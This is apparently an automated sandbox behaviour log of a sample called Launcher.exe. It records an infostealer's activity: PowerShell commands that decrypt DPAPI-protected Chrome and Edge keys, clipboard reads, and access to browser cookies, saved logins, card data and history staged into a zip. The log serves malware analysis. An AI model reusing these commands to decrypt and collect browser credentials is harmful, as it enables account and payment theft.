        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\pkg VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\temp.ps1 VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmp VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmp VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers\bookmarks.json VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers\cards.json VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers\downloads.json VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-aqpx.zip VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
        Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
